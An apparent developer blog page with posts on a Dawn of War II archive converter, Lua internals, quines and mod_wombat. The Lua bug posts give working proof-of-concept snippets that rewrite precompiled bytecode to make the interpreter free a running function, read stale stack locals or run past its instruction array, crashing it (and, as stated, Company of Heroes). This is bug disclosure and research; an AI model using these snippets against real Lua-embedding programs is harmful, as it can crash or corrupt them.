sga4to5

The Dawn of War II Beta is upon us, which brings with it a series of new file formats compared to Dawn of War 1 and Company of Heroes. The most important of these is the SGA format, which is the archive format used by Relic games for game assets. Dawn of War 1 used version 2 SGA files, Company of Heroes used version 4 and Dawn of War II uses version 5 (for completeness, I think Impossible Creatures used version 1, some unreleased project or The Outfit used version 3, and Company of Heroes Online used version 4.1).

I've already released SgaReader2 for looking inside version 5 (and 4.1, 4 and 2) SGA archives. In order to actually mod Dawn of War II properly, we need to be make to make new version 5 archives rather than just read existing ones, which is where sga4to5 comes in.

sga4to5 is a small (8 kilobyte) application which converts a version 4 SGA archive into a version 5 archive.
Download: sga4to5.exe

Combine this tool with something capable of making version 4 SGA archives (e.g. Mod Studio with a CoH mod loaded, or CoH's archive.exe) and you can create new version 5 SGA archives and start modding Dawn of War II. Note that unlike most of my tools, sga4to5 is a command line application, so a quick guide to its command line parameters is in order:

Usage: sga4to5.exe -i[in[put]] file -o[ut[put]] file [-name newname] [-q[uiet]] [-v[erbose]]
  -i, -in or -input specify the input file (version 4.0 / CoH SGA)
  -o, -out or -output specify the output file (version 5.0 / DoW2 SGA)
  -name changes the name in the file header of the output
  -q or -quiet reduces the amount written to the console
  -v or -verbose causes more than usual to be written to the console

Sample usage:
sga4to5.exe -i "E:\Valve\Steam\SteamApps\common\warhammer 40,000 dawn of war ii - beta\MahArchives\v4Attrib.sga" -o "E:\Valve\Steam\SteamApps\common\warhammer 40,000 dawn of war ii - beta\MahArchives\GameAttrib.sga" -v -name "Attributes"

Output from above command:
-- Corsix's SGA v4 to v5 Convertor --
Opened input file and output file
Input archive details:
  name: Made with Corsix's Rainman
  version: 4.0
  data header offset: 184
  data header size: 237960
  data offset: 238144
  data length: 13494961
  content MD5: 0F6155399F5200D5F1FB5F890052542F
  header  MD5: 961A968EDB37216BE0D88DB5EDE95D48
Copying file data, this may take a while...
Output archive details:
  name: Attributes
  version: 5.0
  data header offset: 13495157
  data header size: 237958
  data offset: 196
  data length: 13494961
  content MD5: C1322F3DE54A35A93D14F6A5DEF04ACD
  header  MD5: 4A6A47C63F46490A75800869CF715F75
Done

The actual conversion details are not too interesting; change the version number, add an extra field to the file header, relocate the data header to the end of the file, shrink the TOC records by 2 bytes each, update various offset and length fields, and recalculate the checksums. There are a few interesting implementation details like the initialisation vectors used for checksums and the precise definition of what data is checksummed, but the process is fairly simple conceptually.

More interesting (to me) is the process of squishing the program down to a mere 8 kilobytes. By default, a C++ program compiled using Visual Studio will either dynamically link to msvcr[t|p]90.dll (Microsoft's C/C++ runtime library) or include the required parts of the CRT within the executable itself. Using the former method, sga4to5.exe came out to around 18 kilobytes, but it referenced a several-hundred-kilobyte DLL, and using the latter method, it came to around 70 kilobytes. For a small program, the several-hundred-kilobyte runtime DLL is very excessive, and the 70 kilobyte amalgamation is still 10 times larger than it needs to be. To get any smaller, the C runtime has to be removed, which is a non-trivial process:

Note that the above list is the steps that I had to take to make sga4to5.exe CRT-less, other applications may have other requirements upon the CRT which are harder to remove (YMMV). After performing the above steps, sga4to5.exe came out to 14 kilobytes and referenced only two DLLs, both of which are core Windows DLLs: Kernel32.dll (for CloseHandle, CompareStringEx, CreateFileW, GetCommandLineW, GetStdHandle, ReadFile, SetFilePointer, VirtualAlloc, VirtualFree, WriteConsoleW and WriteFile) and Shell32.dll (for CommandLineToArgvW). The final step was to pass the executable through UPX, which squished it down a bit more to the final size of 8 kilobytes.

Lua 5.1.4 bug recap

  1. Causing the currently running function to be garbage collected
    By using bytecode manipulation, a function's upvalues can point to all instances of that function (i.e. the local in which it is stored, and the stack slot it is placed in while being called), and thus cause them all to become nil. If the function then forces a GC cycle, then it will be collected while still running, leading to a segfault:
function Evil()
  local Experimental, _2
  
  Experimental = function()
    -- Erase all references in the stack to
    -- this (currently running) function:
    Experimental = nil
    _2 = nil -- (this line only does so after bytecode manipulation)
    
    -- Do some cycles of garbage collection to free ourselves, and
    -- some allocations to try and overwrite the memory:
    for i = 1, 10 do
      collectgarbage "collect"
      alloc()
    end
    
    -- A segfault will probably now have occured
  end
  
  Experimental()
end

-- Do some bytecode manipulation of the Evil function:
Es = ('').dump(Evil)
Es = Es:gsub("(\36..."      -- OP_CLOSURE
          .. "%z%z%z%z"     -- Use local 0 as upvalue 0
          .. "%z%z)\128%z"  -- Use local 1 as upvalue 1
          ,
             "%1\0\1")      -- OP_CLOSURE, using locals 0 and 2 as
                            -- upvalues 0 and 1 (local 0 is the
                            -- Experimental function, local 2 is 
                            -- where the function is placed for the
                            -- call)
Evil = loadstring(Es)

-- Function to trash some memory:
function alloc()
  local t = {}
  for i = 1, 100 do
    t[i] = i
  end
end

-- Run the evil:
Evil()
  1. Accessing other function's locals
    The VM call instruction is traditionally done at the top of the stack. However, through bytecode manipulation, it can be done in the middle of the stack, and then after the call is complete, any locals used by the called function will be left at the top of the stack. If a C function was called, then its locals could be used to cause a segfault:
-- Define a Lua function which calls a 'complex' C function
function X()
  io.close()
end

--[[
  X currently looks something like this:
    (2 locals, 2 constants)
    GETGLOBAL "io"
    GETTABLE  "close"
    CALL register 0
    RETURN nothing   
--]]

-- Make some modifications to X
Xs = string.dump(X)
Xs = Xs:gsub("\2(\4%z%z%z)","\20%1")
  -- num locals, num instructions; 2, 4 -> 20, 4
Xs = Xs:gsub("\30%z\128%z","\30\0\0\8")
  -- return nothing -> return all locals
X = assert(loadstring(Xs))

--[[
  X now looks something like:
    (20 locals, 2 constants)
    GETGLOBAL "io"
    GETTABLE  "close"
    CALL register 0
    RETURN registers 0 through 16
    
  Calling X now returns some of what io.close
  left on the stack when it returned!!!
--]]

-- Take the io environment table, and remove the __close method
select(3, X()).__close = nil

--[[
  Call io.close again, within which, these two
  lines cause a segfault:
   lua_getfield(L, -1, "__close");
   return (lua_tocfunction(L, -1))(L);
--]]
X()
  1. Upvalue name array is assumed to be either complete, or absent
    Through bytecode manipulation, an incomplete upvalue name array can be present, which can then lead to a segfault when the interpreter tries to access an element of the array which is not present:
-- Configure these parameters for your environment
sizeof_int = 4    -- sizeof(size_t) in C
sizeof_size_t = 4 -- sizeof(int) in C
endian = "small"  -- "small" or "big"

-- do ... end block so that the locals are used if this is typed 
-- line by line into the interpreter
do
  -- define some locals to be used as upvalues
  local a, b, c
  -- define a function using upvalues
  function F()
    -- Make sure that upvalues #1 through #2 refer to a, b and c
    local _ = {a, b, c}
    -- This line will generate an error referring to upvalue #3
    return c[b][a]
  end
end

-- Convert function F to it's binary form
-- (the values of the upvalues are not dumped)
S = string.dump(F)

-- Remove the upvalue names of upvalues #2 and #3 from the 
-- debug information
if endian == "small" then
  -- We need at-least one upvalue name, or else the upvalue name 
  -- array will be of zero length and thus be NULL (lua allocator
  -- must return NULL when nsize == 0). Thus reduce the upvalue
  -- name array to a single entry.
  P = S:gsub("\3".. ("%z"):rep(sizeof_int - 1) ..
              -- Number of upvalue names (3)
             "\2".. ("%z"):rep(sizeof_size_t - 1) ..".%z"..
              -- Name of upvalue #1 (length 2, "a\0")
             "\2".. ("%z"):rep(sizeof_size_t - 1) ..".%z"
              -- Name of upvalue #2 (length 2, "b\0")
             ,
             "\1".. ("\0"):rep(sizeof_int - 1)
              -- Number of upvalue names (1)
            )
else
  -- Same as previous code, but for big-endian integers
  P = S:gsub(("%z"):rep(sizeof_int - 1) .."\3"..
             ("%z"):rep(sizeof_size_t - 1) .."\2.%z"..
             ("%z"):rep(sizeof_size_t - 1) .."\2.%z"
             ,
             ("\0"):rep(sizeof_int - 1) .. "\1"
            )
end

-- Load the modified binary
M = assert(loadstring(S))

-- Execute the modified function
-- This should cause the error "attempt to index upvalue 'c' (a 
-- nil value)". However, as the name of upvalue #3 is no longer
-- in the upvalue name array, when the VM goes to generate the
-- error message, it references past the end of the upvalue name
-- array, leading to a segfault
M()
  1. LoadString()'s return value is not always checked for NULL
    When loading a string in a binary chunk, LoadString returns NULL for zero-length strings (all string constants contain a null-terminator, and are therefore at least length 1), which in one case is not checked for and leads to a segfault:
loadstring(
  ('').dump(function()X''end)
  :gsub('\2%z%z%zX','\0\0\0')
)()

Generating Lua Inheritance Trees Quickly

Relic games store their entity/building/squad/etc. attributes in Lua files. They have alot of Lua files, all of which look something like this:

-- Some comment about copyright and editing the file by hand
GameData = Inherit([[sbps\races\chaos\chaos_squad.nil]])
GameData["squad_cap_ext"]["support_cap_usage"] = 2.00000
GameData["squad_combat_stance_ext"] = Reference([[sbpextensions\squad_combat_stance_ext.lua]])
-- more changes to GameData...

If you want to create an editor like their official Lua Attribute Editor, then you need to build an inheritance tree out of all those Inherit calls in all those files. The official editor is known for being slow, but I believe I've found a nice fast way to build it.

The first component of this is a function which is given the name of one Lua file, and returns the name of the file that it inherits from. You could load the entire file as text into memory and do search for Inherit( and extract the filename like that, however that would have the following disadvantages:

It would be alot simpler to let the official Lua library handle the parsing and lexing of the source file, and then grab the information we wanted out of the parsed state. So that is exactly what I do:

#include <lua.h>
#include <lauxlib.h>
// ...
struct read_info_t {
  IFile *pFile;
  char cBuffer[1024];
};
const char* ReaderFn(lua_State *L, read_info_t* dt, size_t *size) {
  *size = dt->pFile->readNoThrow(dt->cBuffer, 1, 1024);
  return dt->cBuffer;
}
// ...
lua_State L = luaL_newstate();
read_info_t oReadInfo;
oReadInfo.pFile = RainOpenFile(L"filename", FM_Read);
lua_load(L, (lua_Reader)ReaderFn, (void*)&oReadInfo, "lua file");

The other advantage of using the Lua API to parse the file is that you don't have to read it all in at once; lua_load takes the file a piece at a time.

Now comes the clever part; finding that Inherit filename from the lua_State. The call to Inherit would have compiled to Lua bytecodes:

GETGLOBAL "Inherit" -- Push the global `Inherit` onto the stack
LOADK "filename" -- Load the constants "filename" onto the stack
CALL 1 1 -- Call a function with one argument and one result

Thus if we look through the compiled bytecode looking for a GETGLOBAL Inherit followed by a LOADK and a CALL, we can obtain the filename from the LOADK:

#include <lobject.h>
#include <lopcodes.h>
#include <lstate.h>
// ...
Proto *pPrototype = ((Closure*)lua_topointer(L, -1))->l.p;
Instruction* I = pPrototype->code;
for(int ip = 0; ip < pPrototype->sizecode; ++ip, ++I) {
  if(GET_OPCODE(*I) == OP_GETGLOBAL
  && strcmp(svalue(pPrototype->k + GETARG_Bx(*I)), "Inherit") == 0
  && GET_OPCODE(I[1]) == OP_LOADK
  && GET_OPCODE(I[2]) == OP_CALL) {
    return svalue(pPrototype->k + GETARG_Bx(I[1]));
  }
}

Delving into the Lua internals like that is rather rude, and may be made incompatible even by minor version releases of Lua, but I'll be damned if it isn't extremely fast.

Now that we know which file is Inherit-ed by each other file, it is trivial to construct this into a tree.

Of Lua, Quines and mod_wombat

I've been playing around with Lua (my current favourite dynamic language) in two areas of late: Quines (programs who print their own source code when run), and mod_wombat - a Lua module for Apache2.

First off, a quine:

s="s=%qprint(s:format(s))"print(s:format(s))

That one is a port of a classic C quine from Wikipedia over to Lua:

main() { char *s="main() { char *s=%c%s%c; printf(s,34,s,34); }"; printf(s,34,s,34); }

Of course, if you're going for shortest quine possible, then it would have to be this one:

Yes, that is an empty (zero byte) file. The Lua interpreter will happily execute a zero byte source file, and will output nothing while doing so, which matches the source file (again, a duplicate of a C one from 1994).

Moving on to mod_wombat, I've set up a virtual private server and installed mod_wombat on it. This allows me to make scripted web pages using Lua instead of PHP - something which pleases me greatly. mod_wombat needs work (and a website, etc.), but it is getting some love from Google's Summer of Code, so perhaps one day Lua will be a common language for web development. I'll be posting a link to a mod_wombat powered blog about mod_wombat sometime soon (hosted on the aforementioned VPS), so stay tuned.

I discovered a bug in Lua

The following fragment of code, entered into a Lua 5.1.x (<= 5.1.3) interpreter, can cause the interpreter to crash/segfault:

loadstring(
  string.dump(function()return;end)
  :gsub("\30%z\128",'"\0\0',1)
)()

Note that this only works on standard builds of Lua where virtual machine instructions are expressed in 32 bit little endian integers. So, for example, you can make Company of Heroes crash by entering equivalent code into its console. Read on for a description of why this causes a crash.


Edit: Another related, albeit different crash-causing line: (Which makes it two bugs I've found)

loadstring(
  string.dump(function(...)a,b,c,d=...;a=1;end)
  :gsub("e%z\128\2.....",'\2@\128\0"\0\128\0$')
)()

To understand why this causes a crash, it is important to know:

By combining these three facts, if the penultimate instruction in the array is a special SETLIST, and the final instruction is a RETURN, then the code will pass through the loading checks, and then cause the VM to move beyond the end of the instruction array. The code at the start of this post creates a function comprised to two RETURN instructions (function()return;end), converts it to a string (string.dump), replaces the first RETURN with a SETLIST (gsub("\30%z\128",'"\0\0',1)), then converts the string back into a function (loadstring) and executes it (()). The VM is now executing the random instructions which are after the end of the instruction array, which is very likely to cause a segfault/crash, or in the best-case scenario, an obscure runtime error.

For the second example, it is important to know (on top of the previous knowledge):

The code creates a function with 4 instructions in it (function(...)a,b,c,d=...;a=1;end), converts it to a string (string.dump), replaces the first three instructions with LOADBOOL, SETLIST and CLOSURE instructions (gsub("e%z\128\2.....",'\2@\128\0"\0\128\0$')) then converts the string back into a function (loadstring) and executes it (()). The interpreter executes the CLOSURE instruction, which leads to a segfault because it refers to a non-existent function prototype. The checks that are done when a precompiled chunk are loaded should have caught this and never allowed it to happen, but the SETLIST caused the CLOSURE to be interpreted as a non-instruction. The actual thing that wasn't caught was the LOADBOOL jumping over the SETLIST, causing the CLOSURE to actually be interpreted as an instruction. The other cases of an instruction being skipped have to be followed by a JUMP, so are not useful for this attack, but that check isn't made for LOADBOOL. The CLOSURE could have been one of several other instructions whose array indices are sanity checked at compile-time rather than runtime, but it seemed to give more consistent segfaults, so I went with it.

page: 19 20 21 22